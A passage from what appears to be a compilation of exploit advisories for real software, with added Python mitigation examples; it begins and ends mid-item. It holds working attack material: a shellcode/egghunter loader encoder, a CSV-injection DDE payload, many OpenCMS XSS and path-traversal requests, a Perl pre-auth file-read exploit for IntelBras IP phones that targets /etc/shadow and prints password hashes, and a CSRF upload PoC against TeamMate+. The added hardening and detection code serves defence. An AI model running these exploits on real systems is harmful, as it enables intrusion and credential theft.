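    """EAX after zeroing it and subtracting a, b and c."""
    return (-(a + b + c)) & 0xFFFFFFFF


def load_dword(imms):
    """zero eax ; sub eax,a ; sub eax,b ; sub eax,c ; push eax"""
    return ZERO_EAX + b"".join(SUB_EAX + struct.pack("<I", i) for i in imms) + PUSH_EAX


def build_loader(shellcode, pad=b"\x43"):
    """Bad-character-free code that rebuilds `shellcode` on the stack. The front
    is padded to a multiple of 4 with `pad` (0x43 = inc ebx, the filler the
    exploit's own chunks contain) and the last dword is pushed first, so the
    bytes land in order with ESP pointing at the first one."""
    padded = pad * ((-len(shellcode)) % 4) + shellcode
    words = struct.unpack("<%dI" % (len(padded) // 4), padded)
    return b"".join(load_dword(sub_encode(w)) for w in reversed(words))


def chaospro_loader():
    """The exploit's own loader, reassembled from its hard-coded immediates."""
    return b"".join(load_dword(t) for t in CHAOSPRO_TRIPLES)


def simulate(code):
    """Minimal interpreter for the three opcodes the loader uses; returns the
    bytes left on the stack, lowest address first (what ESP points at)."""
    eax, stack, ip = 0, b"", 0
    while ip < len(code):
        op = code[ip]
        if op == 0x25:                                   # and eax, imm32
            eax &= struct.unpack_from("<I", code, ip + 1)[0]
            ip += 5
        elif op == 0x2D:                                 # sub eax, imm32
            eax = (eax - struct.unpack_from("<I", code, ip + 1)[0]) & 0xFFFFFFFF
            ip += 5
        elif op == 0x50:                                 # push eax
            stack = struct.pack("<I", eax) + stack
            ip += 1
        else:
            raise ValueError("unexpected opcode %#x at offset %d" % (op, ip))
    return stack


def is_clean(code):
    """True if no bad character appears in the emitted bytes."""
    return not any(b in BADCHARS for b in code)


if __name__ == "__main__":
    own = build_loader(EGGHUNTER)
    print("exploit's loader rebuilds  :", simulate(chaospro_loader()).hex())
    print("generated loader rebuilds :", simulate(own).hex())
    print("generated loader clean:", is_clean(own), "size:", len(own))
```

Both loaders leave `43 66 81 ca ff 0f ...` on the stack, i.e. one `inc ebx` followed by the egghunter, and `build_loader` produces 234 bytes for the 35-byte egghunter, the same size as the hand-made version in the 3.1 script (nine sections of 26 bytes). The search returns the first solution per byte; should a value ever need a sum that no three allowed bytes reach, `_encode_byte` raises rather than silently emitting a bad character.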
  4. # Exploit Title: WordPress Plugin Event Tickets <= 4.10.7.1 - CSV Injection
# Google Dork: inurl:"\wp-content\plugins\event-tickets"
# Date: 09-01-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://tri.be/
# Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip
# Version: up to v4.10.7.1
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# Software description: Event Tickets provides a simple way for visitors to RSVP or purchase tickets to your events. As a standalone plugin, it enables you to add RSVPs or tickets to posts or pages. When paired with The Events Calendar, you can add that same functionality directly to your event listings.
# Technical Details & Impact: A visitor's RSVP name is written unchanged into the exported attendee CSV, so a formula in that field runs a command on the computer of the logged-in user who opens the export. The spreadsheet application does show a warning when the file is opened, but users tend to dismiss such pop-ups because the file comes from a known source (their own site).
# POC
1. Visit an RSVP-enabled ticket page.
2. In the Full name field, enter a CSV injection payload, e.g. =cmd|'/C ping -t 127.0.0.1'!A0
3. Log in to WordPress and open the event's details under All Posts > Ticketed > Attendees.
4. Export the attendee list (.csv format).
5. Opening the file executes the injected command on the user's system.
# Timeline
02-08-2019 - Vulnerability discovered
02-08-2019 - Vendor contacted
02-08-2019 - Vendor responded
02-08-2019 - Detailed report shared
02-18-2019 - Contacted vendor on fix status without any response
08-26-2019 - Full disclosure timeline given without any response
09-01-2019 - Full Disclosure
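The five POC steps above come down to one defect: a value the attendee typed is copied unchanged into a CSV cell, and spreadsheets evaluate cells that begin with `=`, `+`, `-`, `@`, a tab or a carriage return. The following is an added example, not part of the advisory or of the Event Tickets plugin (which is PHP): it puts an unhardened exporter of the kind the advisory describes beside a hardened one that prefixes such cells with a single quote, and adds a scanner for exports that were already produced. The attendee rows are constructed sample data; the payload string is the one from the advisory.

```python
import csv
import io

# Leading characters that make Excel or LibreOffice evaluate a cell as a
# formula (the set OWASP lists for CSV injection): = + - @ plus tab and CR.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(cell):
    """True if a spreadsheet would treat this cell as a formula (or DDE call)."""
    return isinstance(cell, str) and cell.startswith(FORMULA_TRIGGERS)


def neutralize(cell):
    """Prefix a single quote so the cell is stored as literal text. Only string
    cells are touched, so numeric columns keep their values."""
    if looks_like_formula(cell):
        return "'" + cell
    return cell


def export_attendees(rows, harden=True):
    """Render attendee rows as CSV text. harden=False mirrors the behaviour the
    advisory describes: the attendee's self-supplied name is copied verbatim."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "email", "rsvp"])
    for row in rows:
        writer.writerow([neutralize(c) if harden else c for c in row])
    return buf.getvalue()


def name_column(csv_text):
    """Parse CSV text back and return the name column without the header."""
    return [r[0] for r in csv.reader(io.StringIO(csv_text))][1:]


def flag_formula_cells(csv_text):
    """Detection side: (row, column) positions of formula-looking cells in an
    already exported file, e.g. to audit downloads sitting in a mailbox."""
    hits = []
    for i, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for j, cell in enumerate(row):
            if looks_like_formula(cell):
                hits.append((i, j))
    return hits


# Constructed sample input: one benign attendee and the advisory's DDE payload
# entered as the "Full name" of an RSVP.
SAMPLE_ATTENDEES = [
    ("Alice Example", "alice@example.com", "yes"),
    ("=cmd|'/C ping -t 127.0.0.1'!A0", "mallory@example.com", "yes"),
]

if __name__ == "__main__":
    unsafe = export_attendees(SAMPLE_ATTENDEES, harden=False)
    print(unsafe)
    print("formula cells in the unhardened export:", flag_formula_cells(unsafe))
    print(export_attendees(SAMPLE_ATTENDEES))
```

The quote prefix is the mitigation OWASP recommends; it stays visible in some spreadsheet applications, which is the accepted trade-off. `csv.QUOTE_ALL` on its own does not help, since the quoting is removed before the cell is evaluated, and a name that legitimately starts with `-` is prefixed too, so apply `neutralize` only to free-text columns.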
  5. # Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235

1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
```

2. Reflected XSS in the login form:
The vulnerability appears when the X-Forwarded-For header is reflected, as in the following request:
POC:
```
GET /login/index.html?requestedResource=&name=Editor&password=editor&action=login HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```

Extended POCs: https://aetsu.github.io/OpenCms
  6. IntelBras TELEFONE IP TIP200/200 LITE 'dumpConfigFile' arbitrary file read (Perl script)

```perl
#!/usr/bin/perl -w
#
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
# Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl
#
#
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
# # ========================================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # ========================================================================================================
# # > Authorization => Basic dXNlcjp1c2Vy
# # > User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
# # > Content-Type => application/x-www-form-urlencoded
# # < Accept-Ranges => bytes
# # < Server => SIPPhone
# # < Content-Type => text/html;charset=UTF-8
# # < Expires => -1
# # < Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
# # < Client-Peer => 192.168.1.1
# # < Client-Response-Num => 1
# # ========================================================================================================
# root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
# admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
# guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
# #
# # ========================================================================================================
# [test@localhost intelbras]$
#
# Simple Mode:
# perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;

# arguments: base URL, file to read, HTTP basic-auth user and password
# (the defaults are the phone's stock user/user account)
my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';

print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";

if ($host !~ m/^http/){
    print "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
    exit;
}

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

# cgiServer.exx evaluates command=dumpConfigFile("<path>") and returns the
# file's contents, so any path on the phone's filesystem can be requested
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload, [ Content_Type => "application/x-www-form-urlencoded" ], " ");
$request->authorization_basic($user, $pass);

print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";

# the response echoes the requested path before the file body; strip it
if ($response->content =~ m/$file/g){
    my $content = $response->content;
    $content =~ s/$file//g;
    $content =~ s/^\n+//;
    print $content;
    print "\n# ========================================================================================================\n";
    exit;
} else {
    print "# Exploit failed or full path is wrong..\n";
    exit;
}
```
  7. # Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13236

1. In Site Management > New site (Stored XSS):
- Affected resource title.0:
POC:
```
POST /system/workplace/admin/sites/new.jsp HTTP/1.1
Host: example.com

title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se
```

2. In Treeview (Reflected XSS):
- Affected resource type:
POC:
```
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=
```

3. In Workspace tools > Login message (Stored XSS):
- Affected resource message.0:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com

enabled.0=true&enabled.0.value=true&message.0=<svg onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=
```

4. In Index sources > View index sources > New index source (Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
Host: example.com

name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=
```

5. In Index sources > View field configuration > New field configuration (Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
Host: example.com

name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=
```

6. In Account Management > Import/Export user data (Reflected XSS):
- Affected resource oufqn:
POC:
```
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp HTTP/1.1
Host: example.com

groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=
```

7. In Account Management > Group Management > New Group (Stored XSS):
- Affected resources name.0 and description.0:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com

name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27
```

8. In Account Management > Organizational Unit > Organizational Unit Management > New sub organizational unit (Stored XSS):
- Affected resources parentOuDesc.0 and resources.0:
POC:
```
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
Host: example.com

name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
```

9. In Link Validator > External Link Validator > Validate External Links (Reflected XSS):
- Affected resources reporttype, reportcontinuekey and title:
POC:
```
POST /system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks HTTP/1.1
Host: example.com

dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
```

10. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0, downloadGallery.0:
POC:
```
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
Host: example.com

------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="inputDir.0"

.
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="destinationDir.0"

/whbo0"><script>alert(1)</script>nrbhd
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="imageGallery.0"

------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="downloadGallery.0"

------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="linkGallery.0"

[...]
```

11. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and downloadGallery.0:
POC:
```
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
Host: example.com

------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="inputDir.0"

gato
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="destinationDir.0"

testszfgw"><script>alert(1)</script>vqln7
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="imageGallery.0"

test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="downloadGallery.0"

test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="linkGallery.0"

test
[...]
```

Extended POCs: https://aetsu.github.io/OpenCms
8. # Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13237

For the tests, I used the payloads:
```
..%2f..%2fWEB-INF%2flogs%2fopencms.log
..%2f..%2fWEB-INF%2fweb.xml
```

1. Affected resource closelink:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com

enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```

2. Affected resource closelink:
POC:
```
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp HTTP/1.1
Host: example.com

reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
```

3. Affected resource closelink:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com

name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```

4. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
Host: example.com

versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```

5. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
Host: example.com

reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
```

Extended POCs: https://aetsu.github.io/OpenCms
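Every one of the five requests above carries the same `closelink=..%2f..%2fWEB-INF%2fweb.xml` value, so the fix is a single canonicalisation check on that parameter. The following is an added example (not OpenCms code) of such a check in Python: it percent-decodes until the value is stable (so `%252e` double encoding is caught), folds backslashes, normalises `..` segments and then refuses anything that leaves the workplace tree. The `/system/workplace/` root and the function names are assumptions for the demo.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Added example, not OpenCms code. The workplace root is an assumption for the demo.
WORKPLACE_ROOT = "/system/workplace/"


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double encoding (%252e%252e) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_closelink(value: str, base: str = WORKPLACE_ROOT) -> Optional[str]:
    """Return the canonical VFS path for a closelink value, or None if it must be rejected.

    Rejects NUL bytes, backslash separators and any path that, once normalised,
    leaves the workplace tree (e.g. ../../WEB-INF/web.xml).
    """
    decoded = fully_decode(value).replace("\\", "/")
    if "\x00" in decoded:
        return None
    # A relative closelink is interpreted relative to the workplace root.
    candidate = decoded if decoded.startswith("/") else posixpath.join(base, decoded)
    canonical = posixpath.normpath(candidate)
    if not canonical.startswith(base):
        return None
    return canonical


def classify(values):
    """Demo helper: map each candidate closelink to 'ok' or 'rejected'."""
    return {v: ("rejected" if resolve_closelink(v) is None else "ok") for v in values}


if __name__ == "__main__":
    # Constructed inputs: the advisory's two payloads, a double-encoded variant,
    # a backslash variant and two benign links.
    samples = [
        "..%2f..%2fWEB-INF%2fweb.xml",
        "..%2f..%2fWEB-INF%2flogs%2fopencms.log",
        "%252e%252e%2fWEB-INF%2fweb.xml",
        "..%5c..%5cWEB-INF%5cweb.xml",
        "/system/workplace/views/admin/admin-main.jsp",
        "views/admin/admin-main.jsp",
    ]
    for link, verdict in classify(samples).items():
        print(f"{verdict:9s} {link}")
```

Checking the prefix only after `normpath` is the point: a plain substring test for `..` misses encoded and backslash forms, while a canonical path either starts with the allowed root or it does not.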
9. Hello,

Please find the below vulnerability details,

---------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability
# Date: 02/09/2019
# Exploit Author: Bhadresh Patel
# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0)
# CVE : CVE-2019-10253

This is an article with PoC exploit code for Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability
---------------------------------------------------------------------------------------------------------------------------------

Title:
====
Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability

CVE:
====
CVE-2019-10253

Date:
====
02/09/2019 (dd/mm/yyyy)

Vendor:
======
Wolters Kluwer is a global leader in professional information, software solutions, and services for the health, tax & accounting, finance, risk & compliance, and legal sectors. We help our customers make critical decisions every day by providing expert solutions that combine deep domain knowledge with specialized technology and services.

Vendor link: http://www.teammatesolutions.com/about-us.aspx

Vulnerable Product:
==============
TeamMate+

TeamMate Global Audit Solutions, part of the Tax and Accounting Division of Wolters Kluwer, helps professionals in all industries at organizations around the world manage audit and compliance risks and business issues by providing targeted, configurable, and efficient software solutions. Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate Analytics. Together, this ecosystem of solutions provides organizations with the combined assurance they need to manage all aspects of risk identification and assessment, electronic working paper creation and management, controls framework management, and data analysis.

Abstract:
=======
A Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an attacker to upload malicious/forged files to the TeamMate server, or replace existing uploaded files with malicious/forged files, by enticing an authenticated user to visit an attacker page.

Report-Timeline:
================
19/03/2019: Vendor notified
19/03/2019: Vendor responded requesting further information
20/03/2019: Further technical information with PoC was shared with vendor
01/07/2019: Vendor fixed the issue in version 3.2

Affected Software Version:
==========================
<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)

Exploitation-Technique:
=======================
Remote

Severity Rating (CVSS):
=======================
4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)

CVE ID:
=======
CVE-2019-10253

Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability is discovered in TeamMate+ which allows a remote attacker to modify application data (upload malicious/forged files to the TeamMate server or replace existing uploaded files with malicious/forged files) without the victim's knowledge by enticing an authenticated user to visit an attacker page/URL.

The specific flaw exists within the handling of requests to the "DomainObjectDocumentUpload.ashx" application. The application fails to validate a CSRF token before handling the POST request.

Vulnerable module/page/application:
/TeamMate/Upload/DomainObjectDocumentUpload.ashx

PoC Exploit code:
----------------------------------------------------------------------------
<html>
<body onload="submitRequest()">
<script>
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx", true);
  xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");
  xhr.withCredentials = true;
  var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +
    "\r\n" +
    "0\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"parentId\"\r\n" +
    "\r\n" +
    "1373\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +
    "\r\n" +
    "34\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"ProjectId\"\r\n" +
    "\r\n" +
    "1106\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +
    "\r\n" +
    "50\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"DocumentParentObjectType\"\r\n" +
    "\r\n" +
    "90\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"files[]\"; filename=\"Report.txt\"\r\n" +
    "Content-Type: application/x-msdownload\r\n" +
    "\r\n" +
    "MZP\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
----------------------------------------------------------------------------

Credits:
=======
Bhadresh Patel
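The PoC works because the upload handler accepts a multipart body that carries only the object identifiers and the file: nothing in the request proves it was built by the application's own page. The following is an added example (not TeamMate code) of the server-side guard that would have stopped it, in Python: a small multipart parser, a same-origin check on `Origin`/`Referer`, and a synchronizer token bound to the session compared in constant time. The field name `__RequestVerificationToken`, the site origin and the session token value are assumptions for the demo; the request bodies are constructed to match the PoC's layout.

```python
import hmac
import secrets
from typing import Dict

# Added example, not TeamMate code. The token field name, the site origin and the
# session token value are assumptions for the demo.
TOKEN_FIELD = "__RequestVerificationToken"
SITE_ORIGIN = "https://teammate.example"


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser: {field name: raw value bytes}."""
    fields: Dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode()):
        if part.startswith(b"\r\n"):
            part = part[2:]
        if part.endswith(b"\r\n"):
            part = part[:-2]
        if not part or part == b"--":
            continue  # preamble or the closing "--" delimiter
        head, _, value = part.partition(b"\r\n\r\n")
        for line in head.split(b"\r\n"):
            if not line.lower().startswith(b"content-disposition:"):
                continue
            for param in line.split(b";"):
                param = param.strip()
                if param.startswith(b'name="'):
                    fields[param[6:].split(b'"', 1)[0].decode()] = value
    return fields


def build_multipart(boundary: str, fields: Dict[str, str], file_bytes: bytes) -> bytes:
    """Constructed request body in the same layout as the advisory's PoC."""
    out = b""
    for name, val in fields.items():
        out += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{val}\r\n'.encode()
    out += (f'--{boundary}\r\nContent-Disposition: form-data; name="files[]"; filename="Report.txt"\r\n'
            f"Content-Type: application/x-msdownload\r\n\r\n").encode() + file_bytes + b"\r\n"
    return out + f"--{boundary}--\r\n".encode()


def upload_allowed(headers: Dict[str, str], body: bytes, session_token: str) -> bool:
    """CSRF guard: same-origin check plus a synchronizer token bound to the session."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return False
    ctype = headers.get("Content-Type", "")
    if "boundary=" not in ctype:
        return False
    boundary = ctype.split("boundary=", 1)[1].strip().strip('"')
    token = parse_multipart(body, boundary).get(TOKEN_FIELD)
    if token is None:
        return False
    return hmac.compare_digest(token, session_token.encode())


BOUNDARY = "----WebKitFormBoundaryNA930lURoQYsoTOn"
POC_FIELDS = {"fileObjectId": "0", "parentId": "1373", "AssessmentId": "34", "ProjectId": "1106",
              "ParentNodeType": "50", "DocumentParentObjectType": "90"}


def demo(session_token: str = "constructed-session-token") -> Dict[str, bool]:
    """Replay four request shapes against the guard; only the last one should pass."""
    ctype = f"multipart/form-data; boundary={BOUNDARY}"
    forged = build_multipart(BOUNDARY, POC_FIELDS, b"MZP")  # the PoC carries no token
    legit = build_multipart(BOUNDARY, {**POC_FIELDS, TOKEN_FIELD: session_token}, b"MZP")
    wrong = build_multipart(BOUNDARY, {**POC_FIELDS, TOKEN_FIELD: secrets.token_urlsafe(16)}, b"MZP")
    same = {"Origin": SITE_ORIGIN, "Content-Type": ctype}
    return {
        "attacker page, no token": upload_allowed({"Origin": "https://attacker.example", "Content-Type": ctype}, forged, session_token),
        "same origin, no token": upload_allowed(same, forged, session_token),
        "same origin, wrong token": upload_allowed(same, wrong, session_token),
        "same origin, valid token": upload_allowed(same, legit, session_token),
    }


if __name__ == "__main__":
    for case, allowed in demo().items():
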